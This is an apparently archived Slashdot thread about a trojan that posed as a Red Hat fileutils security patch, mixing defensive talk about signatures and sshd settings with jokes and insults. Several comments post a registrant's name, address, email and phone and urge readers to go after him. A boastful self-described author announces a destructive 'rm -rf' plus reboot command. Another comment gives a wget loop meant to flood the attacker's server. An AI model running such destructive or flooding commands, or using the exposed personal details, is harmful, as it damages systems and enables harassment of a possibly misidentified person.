    This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

    Seems someone has gotten smart on it and turned the site off .......

    Hope the fuckers get nailed for it.

  175. Registration info. by JPriest · · Score: 1

    Here is the domain registration info, I doubt this person is the same person behind this but here is the info anyway:

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533

    --
    Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
  176. whois fedora-redhat.com by Anonymous Coward · · Score: 0

    Shouldn't be too hard to find him.

    Domain Name fedora-redhat.com
    Creation Date 2004-10-24
    Registration Date 2004-10-24
    Expiry Date 2005-10-24
    Organisation Name Raymond Jackson
    Organisation Address 224 Cedar Avenue
    Organisation Address New York
    Organisation Address 95301
    Organisation Address NY
    Organisation Address UNITED STATES

    Admin Name Raymond Jackson
    Admin Address 224 Cedar Avenue
    Admin Address New York
    Admin Address 95301
    Admin Address NY
    Admin Address UNITED STATES
    Admin Email rayjackson23@yahoo.com
    Admin Phone +1.2098994533

    Tech Name YahooDomains TechContact
    Tech Address 701 First Ave.
    Tech Address Sunnyvale
    Tech Address 94089
    Tech Address CA
    Tech Address UNITED STATES
    Tech Email domain.tech@YAHOO-INC.COM
    Tech Phone +1.6198813096
    Tech Fax +1.6198813010
    Name Server yns1.yahoo.com
    Name Server yns2.yahoo.com

  177. Re: Fully Patched? IE6 by Nyder · · Score: 1

    A lame AC posted:
    If you want to have a tonne of spyware/adware installed onto your system (specifically system32), load up this site with IE6. Fully patched or not, it will install several spywares automatically upon loading up the main site. No permission is asked, and no dialogs pop up. The only indication that anything's wrong is that there's a lot of activeX "plugin" mentions in the status bar, and a lot of warnings from your firewall as the spyware phones home.

    http://www.torrentreactor.com

    Well, that explains why it takes forever to load this site in Firefox and it always errors out, even though all the torrent links are loaded.

    --
    Be seeing you...
  178. How does... by Anonymous Coward · · Score: 0

    this script create a user and start sshd if it is run from a regular user account? Don't you need root privileges to do that?

    1. Re:How does... by Anonymous Coward · · Score: 0

      if [ `id -u` != "0" ]
      then
          echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
          exit
      fi

  179. remote administration by subscription by jesterzog · · Score: 1

    Remote administration, perhaps? Although I administer my own system reasonably confidently, the best systems I've used are ones that are locked down and administered by people who know exactly what they're doing.

    Maybe not tomorrow, but I wouldn't be too surprised if that's the way things eventually go. Fast connections are becoming more common in many places these days. The main problem would be figuring out a protocol and a secure and standard-enough system so that administration companies can administer large numbers of workstations remotely. If that's figured out reliably enough, I don't think it'd take long for a lot of people I know to be quite happy to pay a trusted other person a subscription charge to remotely keep their system stable, and provide whatever services and applications they want without the risk of it spluttering and breaking.

    Most geeks probably wouldn't go for this --- at least not in today's world --- but a lot of people would. This is just one possibility, of course.

    1. Re:remote administration by subscription by dj_cel · · Score: 1

      This would be a good example. I was thinking of something kind of similar; what protocol would be suitable for this? I think the advancement of Firefox would be a step in the right direction as well. If general consumer PCs were set up as more of thin clients, and major software moved to browser-based applications through Firefox, you might give users access to a music library, process documents, or whatever via this route. Of course this would be for general audiences that read emails and type papers; workstations would still be a must for graphics or whatever else, but this would be a reasonable way. Maybe the service would cost something like $10 a month, unlimited access to music, movies and some apps. This would be genius and make a killing.

      --
      Those who can make you believe absurdities can make you commit atrocities. - Voltaire
  180. Re: text (Why? Because.) by Thing+1 · · Score: 5, Funny

    This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.

    --
    I feel fantastic, and I'm still alive.
  181. Site re-borked by Stephen+Samuel · · Score: 1
    Why post the text instead of having the /. crowd flood their server to see what they've put up there?

    Well, among other things, the site is now very very down.. First time I looked, it just had a note: "This domain has been temporarily disabled. If you are the owner please contact customer service" (paraphrase from memory). Next time I looked, the domain name wasn't even resolving.
    Still isn't.

    Slashdotted, borked and broken..... Too bad we couldn't do that more often (to sites like this, I mean).

    I would, however, like to see what the trojan tarball was designed to do.

    --
    Free Software: Like love, it grows best when given away.
  182. Jobs by simontek2 · · Score: 0, Offtopic

    I really need some of you guys' resumes. I should be hiring for Linux tech around February.

    --
    SimonTek
    1. Re:Jobs by Anonymous Coward · · Score: 1, Funny

      In India or U.S.?

  183. whois fedora-redhat.com by Anonymous Coward · · Score: 0

    whois fedora-redhat.com

    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533

  184. You need to be smart to install it by shish · · Score: 1
    Being a gentoo user, having a compiler is just something I expect to always be there; but then I remembered that this is a user-oriented distro.

    What normal user has a compiler, sshd, and a terminal app installed, and the knowledge of how to use the command prompt, and then doesn't have the sense to avoid obviously bogus security updates?

    --
    I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    1. Re:You need to be smart to install it by atomic-penguin · · Score: 1

      Yes holy gentoo user, I bet you have checked every line of code you have ever compiled. There is no such thing as a non user-oriented distro. You said it yourself, "Being a gentoo user...". Note you didn't say, being a gentoo developer I have checked third party emerges for malicious code. Yeah, it could happen, please step down from the high-horse.

      --
      /^([Ss]ame [Bb]at (time, |channel.)){2}$/
    2. Re:You need to be smart to install it by shish · · Score: 1
      WTF? I said "being a gentoo user, I'm used to having a compiler handy", NOT "being a gentoo user, me > *". The distro and myself have nothing to do with this, other than to point out the need for a compiler.

      As to there being no user-oriented distros, I have a feeling you were just disagreeing with me because you were angry at my first comment; but to make things clear, I class distros like so:

      User distros: Red Hat, Mandrake, Suse, etc
      Dev distros: Gentoo, Slack, LFS, etc

      The user distros, aimed at joe average (as is this type of attack), tend not to install gcc by default, and so this attack fails. The dev distros, aimed at those with a clue (not the target of this kind of attack) are the ones likely to have gcc, and hence are vulnerable to it.

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    3. Re:You need to be smart to install it by atomic-penguin · · Score: 1

      I was just making two points. One being that being a Gentoo user does not give you a significant understanding of how the system works. I know a couple of clueless Gentoo users. The other is that Gentoo's build system could be exploited through 3rd party emerges. Please correct me if I am wrong. If my points didn't come across clearly at first, it was through lack of caffeine consumption.

      --
      /^([Ss]ame [Bb]at (time, |channel.)){2}$/
    4. Re:You need to be smart to install it by shish · · Score: 1
      I've found that the average technical distro user tends to know a lot more than a user distro user, but there are always exceptions - I use gentoo because I know what I'm doing*, but the skript kiddies tend to think they know what they're doing because they use gentoo...

      * and yes, I know. Part of knowing what I'm doing is knowing how time-wasting and inefficient compiling from source is; but in my case I've found that the side effects of compiling from source outweigh the compile time. I'm not just being a stereotypical Gentoo fanboy ;)

      But on topic, the fact that I use Gentoo has little to do with my point. I was just saying how I expect a compiler as standard (and maybe the exploit author did too, hence the requirement of one), but that a regular user wouldn't; no elitism was intended.

      And as far as I know, /all/ linux systems are vulnerable to clueless users downloading & running things they shouldn't...

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
    5. Re:You need to be smart to install it by atomic-penguin · · Score: 1

      Sorry I was way out of line. I am an asshole. I read your initial post all wrong. Not only did I read it wrong once, but twice. I took offense from the start from the "Being a gentoo user...compiler is pretty much standard." Which sounds a lot like elitist gentoo crap. Like wtf, he actually thinks gentoo is the only system dependent on compilers? I had never read the funroll-loops page, utterly hilarious thanks for posting that. Sorry, and hope you can overlook my hasty arrogance.

      --
      /^([Ss]ame [Bb]at (time, |channel.)){2}$/
  185. Even if you have the code ... by Gopal.V · · Score: 1

    > Running untrusted code can result in system compromise.

    Even if you have the CODE !!.

    So much for "Open Source" trojans :)

  186. Who was it posted to? by ozmanjusri · · Score: 1

    Is there a pattern of addresses the phish was posted to? There may have been a mailing list or Linux user database compromised.

    --
    "I've got more toys than Teruhisa Kitahara."
  187. Seems nobody mentioned the best part.. by eddy · · Score: 1

    LinuxWorld linked to the fake alert! You know, LinuxWorld featuring Maureen O'Gara? They've since yanked it, but boy were they fast in linking to it...

    --
    Belief is the currency of delusion.
    1. Re:Seems nobody mentioned the best part.. by Tony-A · · Score: 1

      LinuxWorld linked to the fake alert! ... They've since yanked it, but boy were they fast in linking to it...

      Initial reactions can be very telling.
      Security updates should always be treated with a bit of suspicion.
      Unexpected updates from strange places are almost certainly fakes.

  188. WTF?? by temojen · · Score: 2, Insightful
    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

    We're supposed to believe this?

  189. Tinfoil Hat Theory by Anonymous Coward · · Score: 0

    Well to be a little paranoid, since a recent rootkit was also released for OS X and since Red Hat is the most well known Linux distro and maybe the most widely used, maybe some jealous folks in Redmond created exploits to make it look like their two biggest competitors were "just as vulnerable."

    Both look sloppy and would take a real moron running the system to be exploited, but they are enough to generate headlines that say "Linux and OS X are just as insecure as Windows."

  190. Most users won't be affected, but look out for.. by vivekg · · Score: 1

    Yes, most users are good techies, and hard-core Linux users don't use RedHat or Fedora on their home systems. Now about security: one Gentoo bug deleted the entire /usr file system without any such bug, so we need to be careful on both fronts, I guess.

    --
    The important thing is not to stop questioning --Albert Einstein.
  191. Re: I'll try it... Execution results! by colinleroy · · Score: 1
    Looks like the AllowUsers directive of sshd_config can be a useful little bit of paranoia. I could run that at home and it would fail completely.
    --
    blah
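    Why colinleroy's AllowUsers line would make the trojan's freshly created account useless, as an added example that is not code from the thread or from OpenSSH. It re-implements in Python the order sshd_config(5) documents for the user directives (DenyUsers is checked first, then AllowUsers; once AllowUsers is present anyone not listed is refused), including the USER@HOST form and the `*`/`?` wildcards. The config fragment, the user names and the addresses are constructed; AllowGroups/DenyGroups and Match blocks are left out, and fnmatch's `[...]` classes are a small superset of sshd's wildcards.

```python
"""Model sshd's DenyUsers/AllowUsers decision for a login attempt.

Added example with a constructed sshd_config fragment; it is not OpenSSH's
own matching code, only the documented rule order and pattern forms.
"""
import fnmatch


def _parse_directives(config_text):
    """Collect AllowUsers and DenyUsers patterns; comments live on their own lines."""
    allow, deny = [], []
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        patterns = value.split()
        if key.lower() == "allowusers":          # keywords are case-insensitive
            allow.extend(patterns)
        elif key.lower() == "denyusers":
            deny.extend(patterns)
    return allow, deny


def _matches(pattern, user, host):
    """USER@HOST restricts both halves; a bare pattern restricts the user only."""
    if "@" in pattern:
        upat, hpat = pattern.split("@", 1)
        return fnmatch.fnmatchcase(user, upat) and fnmatch.fnmatchcase(host, hpat)
    return fnmatch.fnmatchcase(user, pattern)


def login_allowed(config_text, user, host="127.0.0.1"):
    """True if sshd would let `user` from `host` past the Deny/Allow user checks."""
    allow, deny = _parse_directives(config_text)
    if any(_matches(p, user, host) for p in deny):
        return False                      # DenyUsers is evaluated first and wins
    if allow:
        return any(_matches(p, user, host) for p in allow)   # listed or refused
    return True                           # no AllowUsers: default is allow


# Constructed fragment: only the owner's account, and only from the LAN.
# An account the trojan adds (here 'bogus') never matches and is refused.
PARANOID_CONFIG = """
PermitRootLogin no
# real user, LAN only
AllowUsers colin@192.168.1.*
DenyUsers root
"""

OPEN_CONFIG = "PermitRootLogin yes\n"   # no Allow/Deny lines at all

if __name__ == "__main__":
    for cfg_name, cfg in (("paranoid", PARANOID_CONFIG), ("open", OPEN_CONFIG)):
        for user, host in (("colin", "192.168.1.7"), ("colin", "10.0.0.9"),
                           ("bogus", "192.168.1.7")):
            print(cfg_name, user, host, login_allowed(cfg, user, host))
```

    The catch the thread already points at: the trojan runs as root, so it can also rewrite sshd_config. AllowUsers raises the bar only while the configuration itself is still yours.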
  192. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    Yep, it's Romanian all right.

    The translation for "Inca un root frate belea: " would be "Another fuckin' root: " whilst "Inca o roata" is "Yet another wheel".

  193. Re:DON'T DO THIS by Anonymous Coward · · Score: 0

    Morons don't use Linux you fucking cretin.

  194. Re: text (Why? Because.) by Tony-A · · Score: 1

    This is an honor virus. Please forward to all your friends, then ...

    They all are.
    The difference is in how visible what they are up to is.
    Hiding stuff from "dumb" users is a bad idea.

  195. MOD PARENT up by Anonymous Coward · · Score: 0

    The address is right there.
    Go Fuck him

  196. What about Fedora Core 3? by xbsd · · Score: 1

    Excuse me while I put on my tin-foil hat, but I have this weird feeling about it. True, everything seems so sloppy (just think about it, he sent the e-mail to advocacy@openbsd, that's how I got it). However, Fedora Core 3 is about to be released in two weeks or less and lots of FC2 users will be pointing at the Red Hat servers in a few days. I think Red Hat should be quite careful w/this one.

  197. Re: text (Why? Because.) by Stephen+Samuel · · Score: 4, Funny

    This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
    Thank you.

    --
    Free Software: Like love, it grows best when given away.
  198. Re: I'll try it... Execution results! by KarmaPolice · · Score: 3, Informative
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    Been there, done that:
    <root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
    Recipient Rejected: Not accepting mail for this account : Account
    terminated due to violation of user agreement

    ...the system works!

  199. Re: I'll try it... Execution results! by sslcomm · · Score: 1

    Actually, the translation is along the lines of "Another root bro, cool!". The mail subject is somewhat similar ("yet another root") - "roata" means wheel, but it's a common word for root in Romanian IRC/script kiddie lingo. HTH

  200. Not completely clueless by Stephen+Samuel · · Score: 1
    They don't have to fool everyone, just a bunch of select, clueless newbies.

    Not completely clueless.. They'd need somebody who knows enough to follow the instructions (and recognize them as vaguely reasonable), but who's just clueless enough to not know that Red Hat would never release a patch in this manner.

    I know a few people who would have a problem passing test one (recent converts where I installed their system for them), but most people who could easily pass the first test would also smell the rat.

    --
    Free Software: Like love, it grows best when given away.
    1. Re:Not completely clueless by thegrassyknowl · · Score: 1

      I concede on one point - the newbie would have to know enough to become root to install the "patch".

      Some know how, some don't.

      I remember in my young days (by young, I came in at Red Hat 5). I knew how to become root by the end of the first day, but didn't know anything about this "monster" called RPM. If someone had offered me a "patch" in the form of a TGZ file along with instructions on how to "install" it, I probably would have done it.

      It takes a while to learn about RPMs and package signing and things like that, and most newbies learn how to become root LONG before they learn any of those things... Most new Linux users would see that site (fedora-redhat...) as legitimate and follow blindly.

      --
      I drink to make other people interesting!
    2. Re:Not completely clueless by chthon · · Score: 1

      Yes, these are the people that always cause trouble, the ones who think that they know about computers and software, but do not have any technical background in either.

      I had problems in the past with them; they were always the people who brought viruses onto the system.

      The only thing that has changed since those days is that client software from a certain well-known monopolist has also made it possible for completely clueless users to infect systems. At least those were happy enough to do their job using the computer.

  201. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    http://mixmaster.sourceforge.net/

  202. Re: text (Why? Because.) by commodoresloat · · Score: 1
    The url was in the slashdot story. It doesn't take a brain to copy and paste it if you really wanted to click and go there.

    By the way, the site does not resolve at all as of now (1:48 am in Los Angeles). I guess the slashdot story did lead to it getting taken offline one way or another.

  203. Re: I'll try it... Execution results! by voodookid · · Score: 1

    Translation from Romanian to English: "Another root account dude!"

  204. Lucky I use Gentoo and not a binary based distro! by OneNonly · · Score: 1

    This patch would still be compiling by the time I got to Slashdot... ;-)

  205. Because I hate redhat. -nt- by irc.goatse.cx+troll · · Score: 1



    --
    Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
  206. MOD PARENT UP by Anonymous Coward · · Score: 0

    and I don't even watch baseball

  207. Re: Fully Patched? IE6 by Celt · · Score: 1

    In fairness I'd imagine most people here are using other browsers besides IE 4/5/6. If you're on the net and you load ActiveX etc. without wanting them, I have no pity for you.
    Use Opera or FF etc. for feck's sake!

    --
    "WebTV: bringing the Internet into the shallow end of the gene pool since 1995" - Martin Bishop
  208. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

    So how many people do you expect to actually fall for this trojan, and then mail "bogus" results to them?

  209. We need a stronger Web of Trust by KjetilK · · Score: 1

    Everyone checks the gpg signatures right?

    Well, sure, but... Can I trust what I'm seeing?

    Often, distros rely on the keyring having been distributed by trusted means, and on the keyring not having been compromised. But since, for PGP to be useful in checking e-mail and such, people generally import lots of keys, this is not the best thing to rely on.

    Anybody can generate a keypair "Red Hat Security " or whatever, and sign their trojan with that. Sure, gpg will report that the "update" is unmodified and signed by security@redhat.com. But since you do not know who security@redhat.com is, you can still be duped.

    We should be building a huge social network, a PGP-based web of trust (WOT), so that you can actually check if the guy who signed a package is trusted by you or someone else you trust. People need to generate keypairs, go to keysigning parties, take the opportunity to exchange signatures whenever one is out travelling, etc. Go get yourself registered as willing to sign.

    The next problem is to decide who you "ownertrust". To extend your WOT to people you haven't met, you assign an "ownertrust" to people, which says something about to what extent you trust them to correctly verify the identity of others.

    I think this is rather hard to do these days. I don't know enough people personally to know their key signing habits, if they keep their private key safe, and stuff like that. Such things are important to know if you are to ownertrust.

    I have thought about it a bit, and I think it would be nice if one could declare important aspects of one's policy in such a way that people could easily find the policy when going through their keyring to set ownertrusts.

    Say, one could for example use FOAF to say things like "I only sign people I meet face to face after carefully checking their photo IDs and having them respond to an encrypted e-mail" and "I keep my private key on a networked computer that I control", "my passphrase is a mangled 20+ letter string" etc.

    gpg --update-trustdb and similar tools could display these policies to the user and aid the user in making a more informed decision.

    The problem with this approach is of course that people can state a policy they don't follow, but the non-personal WOT is really built on signatures, so I don't think that is a problem.

    What do people think of this idea?

    --
    Employee of Inrupt, Project Release Manager and Community Manager for Solid
  210. FUCKING MOD PARENT UP by Anonymous Coward · · Score: 0

    and grandparent. This is some funny shit.

  211. Re:Stupid Tricks? (Gentoo) by Anonymous Coward · · Score: 0

    I disagree, a lot of people installed Gentoo and BSD and believe the operating systems to be effective tools for computing, while in reality they are resting comfortably in oblivion. Stupid? I think so.

  212. Could this be the same person you're after? by Anonymous Coward · · Score: 0

    They were trying to use cc's on a hosting company earlier this year.

    Topic: I need password and learn to hack

    posted by Jackson on 2004-01-12 22:58:56
    [Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)] [203.162.3.147]*

    Please send me password of account: haikiengiang2003@yahoo.com
    And I want to study how to hack password email, please tell me... hix hix
    I'm really to study
    Send me the lesson on jacksonddt@yahoo.ca
    Thanks very much...,
    jackson

    Here's a forum they were using at the time.
    <URL:http://hanoi.vnn.vn/goctem/kb_td_mb/detail.asp?ID=2320445782/>

  213. Ah, Romania by Anonymous Coward · · Score: 0

  214. GPG key checks out... by morzel · · Score: 1

    As others have mentioned, the archive contains an (unaltered) version of a genuine Red Hat RPM so the GPG sig for that file is actually intact.

    Of course the icky bits of the rootkit are in the installer, not in the supplied RPM (which isn't used).

    --
    Okay... I'll do the stupid things first, then you shy people follow.
    [Zappa]
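Added example, not code from either commenter or from Red Hat: a small checker that reads the machine-readable lines gpg prints on --status-fd and, as comment 209 argues, does not treat a GOODSIG from a lookalike "Red Hat Security" key as proof of anything unless the key is pinned or carries full/ultimate ownertrust. As comment 214 notes, the verdict is per file: a valid signature on the bundled RPM says nothing about the installer next to it. The status lines, fingerprints and pinned set below are constructed placeholders.

```python
"""Turn gpg --status-fd output into an accept/reject decision.

Added example (not from the thread or from Red Hat). Status lines and
fingerprints below are constructed, not real Red Hat key material.
"""
import re

STATUS_RE = re.compile(r"^\[GNUPG:\] (\S+)(?: (.*))?$")

# Keys verified out of band (e.g. from install media), by full fingerprint.
# Constructed placeholder value.
PINNED_FINGERPRINTS = {"0000000000000000000000000000000000000001"}

# Only these ownertrust outcomes mean your web of trust vouches for the key.
TRUSTED_LEVELS = {"TRUST_FULLY", "TRUST_ULTIMATE"}

def assess_gpg_status(status_lines, pinned=PINNED_FINGERPRINTS):
    """Return (verdict, reason); verdict is 'accept' or 'reject'."""
    good = valid_fpr = trust = None
    for line in status_lines:
        m = STATUS_RE.match(line.strip())
        if not m:
            continue
        keyword, rest = m.group(1), m.group(2) or ""
        if keyword == "GOODSIG":
            good = rest                    # "<keyid> <user id>"
        elif keyword == "VALIDSIG":
            valid_fpr = rest.split()[0]    # first field is the fingerprint
        elif keyword.startswith("TRUST_"):
            trust = keyword
        elif keyword in ("BADSIG", "ERRSIG", "NO_PUBKEY", "EXPKEYSIG", "REVKEYSIG"):
            return "reject", f"{keyword}: signature is bad or the key is unusable"
    if not good or not valid_fpr:
        return "reject", "no valid signature found"
    if valid_fpr in pinned:
        return "accept", f"signed by pinned key {valid_fpr}"
    if trust in TRUSTED_LEVELS:
        return "accept", f"signed by {good!r}; key is {trust} in your web of trust"
    # The lookalike-key case: the signature is cryptographically fine, but
    # nobody you trust vouches for who holds the key.
    return "reject", f"GOODSIG from {good!r} but ownertrust is {trust or 'unknown'}"

# Constructed status output for a key gpg has never seen vouched for.
LOOKALIKE_STATUS = [
    "[GNUPG:] NEWSIG",
    "[GNUPG:] GOODSIG 1111111111111111 Red Hat Security <security@redhat.com>",
    "[GNUPG:] VALIDSIG 2222222222222222222222222222222222222222 2004-10-20 1098230400 0 4 0 1 2 00 2222222222222222222222222222222222222222",
    "[GNUPG:] TRUST_UNDEFINED 0 pgp",
]
```

To use it for real, run `gpg --status-fd 1 --verify file.sig file` and feed its stdout lines to assess_gpg_status.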
  215. Installer Sandbox? by Midnight+Thunder · · Score: 1

    With the announcement of this trojan and the potential Mac trojan, it got me wondering whether an 'installer sandbox' would be of use. Basically it would allow the installer to run and then check which files would have been installed or modified. It would then warn of any potential security issues and at that point you can decide whether you wish to run the installer for real.

    A simple generic version of the tool would allow you to log all file accesses of a file. This would be like lsof for a process, but instead would monitor the application from launch to exit.

    --
    Jumpstart the tartan drive.
  216. Re: text by Proteus · · Score: 1
    Create a text file called dl-patch.sh (or something) with the following contents:

    #!/bin/sh
    # Fetch the file every five seconds and discard it; Ctrl-C to stop.
    while true; do
        wget -nd "<url-to-patch-file>" -O /dev/null
        sleep 5
    done

    Of course, you'll have to replace <url-to-patch-file> with the appropriate URL pointing to the patch script. The -O /dev/null causes wget to write the patch to /dev/null, which effectively means it goes off into no-man's land, and never gets written to disk.

    The sleep is a good idea because otherwise the server is likely to automatically block you as a DoS attacker.
    --
    We may not imagine how our lives could be more frustrating and complex—but Congress can. – Cullen Hightower
  217. Re: I'll try it... Execution results! by Spoing · · Score: 1
    So how many people do you expect to actually fall for this trojan, and then mail "bogus" results to them?

    Your guess is as good as mine. I'd expect quite a few.

    --
    A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
  218. Re: I'll try it... Execution results! by Spoing · · Score: 1
    http://mixmaster.sourceforge.net

    Quoting from above:

    "Mixmaster is the type II remailer protocol and the most popular implementation of it.

    Remailers provide protection against traffic analysis and allow sending email anonymously or pseudonymously. Mixmaster consists of both client and server installations and is designed to run on several operation systems including but not limited to *BSD, Linux and Microsoft Windows. "

    Interesting... though you still have to send it through a normal mail server at some point. That system will have headers pointing back to the remailer server. Even if the headers are forged, the most recent servers will not be forged unless you use multiple mixmaster (or other) remailers that strip the headers.

    Without that strip and resend capability, the bad guys can still get lots of information though I admit won't easily find the original sending machine. I'd check the headers carefully just in case, though!

    --
    A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
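Comments 208 and 218 both turn on the same point: the Received: headers a mail collects on its way out name every relay and the address it accepted the message from. Added example, not from either commenter: a Python walk of that chain, the way an incident responder would read it. The message is constructed with RFC 5737 documentation addresses, and all host names are made up.

```python
"""Walk the Received: chain of a mail to see which relay IPs it exposes.

Added example, not from the thread. The sample message is constructed with
documentation-range addresses (RFC 5737); none of the hosts are real.
"""
import email
import re

# "from <claimed host> (<comment with [ip]>) ... by <receiving host>"
HOP_RE = re.compile(r"from\s+(\S+)\s*(?:\(([^)]*)\))?.*?\bby\s+(\S+)", re.S)
IP_RE = re.compile(r"\[([0-9a-fA-F.:]+)\]")

def received_chain(raw_message):
    """Return hops oldest-first as (claimed_from, relay_ip, received_by)."""
    msg = email.message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())           # unfold the header
        m = HOP_RE.search(text)
        if not m:
            continue
        claimed_from, comment, received_by = m.groups()
        ip = IP_RE.search(comment or "")
        hops.append((claimed_from, ip.group(1) if ip else None, received_by))
    hops.reverse()          # the topmost Received: is the most recent hop
    return hops

def origin_ip(raw_message):
    """The address the first relay actually talked to: the best lead to the sender."""
    chain = received_chain(raw_message)
    return chain[0][1] if chain else None

# Constructed message: a test box mails "results" out through one relay.
SAMPLE_MAIL = (
    "Received: from relay.example.net (relay.example.net [192.0.2.10])\n"
    "    by mx.example.org (Postfix) with ESMTP id ABC123\n"
    "    for <collector@example.org>; Wed, 20 Oct 2004 10:01:02 +0000\n"
    "Received: from honeypot.lab.example (unknown [198.51.100.7])\n"
    "    by relay.example.net (Postfix) with SMTP id DEF456;\n"
    "    Wed, 20 Oct 2004 10:00:58 +0000\n"
    "From: tester@honeypot.lab.example\n"
    "Subject: constructed sample\n"
    "\n"
    "constructed body\n"
)
```

Only the hop added by a relay you trust is reliable; the "from" host name in each line is whatever the sending side claimed, so compare it against the bracketed address.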
  219. Interesting that they didn't use RPM by kurt555gs · · Score: 1

    I like the fact you have to make, make install.

    If they sent the trojan in RPM format chances are it would crash with dependency problems.

    Cheers

    --
    * Carthago Delenda Est *
  220. Re:It will be interesting by Anonymous Coward · · Score: 0

    What a fecking troll.

    You can keep touting this false meme all you want but it isn't going to make it magically come true (if it *were* true, then Apache, which arguably *is* in the spotlight, would have more remotely exploitable security breaches than MS's IIS). Why don't you face the fact that MS isn't being treated any worse than they deserve? They even admit themselves that their focus isn't on security (it's on maximizing profit--duh!).

    Oops, I forgot! You were trolling! Sorry to interrupt.

  221. You guys are all funny by Anonymous Coward · · Score: 0

    Writing that code was awesome ... I did not intend to do any harm but to test the stupidity of random persons.

    Oh my gosh ... I couldn't even count how many .edu-s and .gov-s came ... so shut the f up and get to realize this was a White Hat deal. Another dude would've gotten into all the boxes and screwed 'em up.

  222. Certainly not a first trojan... by Anonymous Coward · · Score: 0

    I remember seeing the following message in the ancient times of text terminals and PINE:
    "The rearrangements in our servers require all our clients to type right now 'V' 'S' and 'Y' on the terminal. Please follow the orders carefully."
    The message had an attachment, named .cshrc :)

  223. Re: text (Why? Because.) by erroneus · · Score: 1

    HAhaaha... you're right.

    You wrote it didn't you! :)

  224. Fedora-Redhat.com White Hat business by Fedora-Redhat.com · · Score: 1

    From The Author of fileutils-1.0.6.patch.tar.gz :) I wrote that little script only for testing random persons' stupidity. Stop talking shit and commenting on this crap. You accuse me of more than I've done. Also, there were lots and I mean LOTS of .edu and .gov in the inbox ... I did not login in any of those servers so ... It was a cool experience ... worth the time and I also had a copious laugh ... honestly Thank you guys for all your advice ... I am currently on a 1.0.7 version :)) that you won't even intercept and the purpose will be ssh -l user server --> rm -rf /var /sbin /home /usr ; /bin/reboot -n ... Btw... I hate redhat and fedora ... too many segfaults honestly :) They're good though for rk and script testing ... (knoppix should do) ... The devil f*cks the penguin :)))

    1. Re:Fedora-Redhat.com White Hat business by Anonymous Coward · · Score: 0

      Suuuuuuuuure. GFY and never come back.

    2. Re:Fedora-Redhat.com White Hat business by zuesse · · Score: 1

      And this is your mind on microsoft...

      Any questions?

      --
      What great fortune for rulers that men do not think.
  225. Addlebrain provides free email service though! by HydroPhonic · · Score: 1

    ... so it could be anybody...

  226. The link is down now thank goodness by davidwr · · Score: 1

    Someone slapped them.
    Hope someone gets a visit from the FBI over this.

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  227. Re: I'll try it... Execution results! by Tony-A · · Score: 2, Insightful

    ...the system works!

    Agreed, but one needs to be very, very careful about any assumptions as to exactly which system it was that worked.

    The first order of business is to somehow, anyhow, stem the tide.
    The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
    Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superior forces with inferior forces.

    Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.

  228. translation of the text messages :) by tirnacopu · · Score: 1

    Well, it seems a Romanian fellow wrote the thingie -
    "Inca un root frate belea:" means "Another root bro cool"
    "mama" means exactly what it seems
    "stii tu" = "you know"
    "Inca o roata" = "another wheel"

  229. Re:It will be interesting by Anonymous Coward · · Score: 0

    (if it *were* true, then Apache, which arguably *is* in the spotlight, would have more remotely exploitable security breaches than MS's IIS)

    According to an article Slashdot itself posted, Apache IS the most-breached server. Headline was "Linux Most Attacked OS On Net"--search for it yourself and see.

    The truth hurts and all, but it's the truth.

  230. Re: text (Why? Because.) by Thing+1 · · Score: 1

    Heh, I was going to add text saying that the honor viruses that made the rounds were actually coded wrong, because they performed the steps backwards (as you did). But then I figured that was too much verbiage for a +5 Funny. ;-)

    --
    I feel fantastic, and I'm still alive.
  231. Well commented source-code by zaphraud · · Score: 1

    Good thing they left all those comments in there, makes it much easier to read once decrypted, huh?

  232. Hotlink to image on redhat?!?!? by zaphraud · · Score: 1

    Gee, no wonder RH was on top of this -1 days from the Slashdot posting. That means it was right there in their server's REFERER logs from the very instant it first happened! I hate to say this, but in all fairness, I don't think anyone EVER gave Microsoft a heads up like that, did they? Now granted, Microsoft is still the company that withholds a response to a security incident until it makes the 6 o'clock TV news. I'm just saying that this incident doesn't necessarily make RedHat saints...

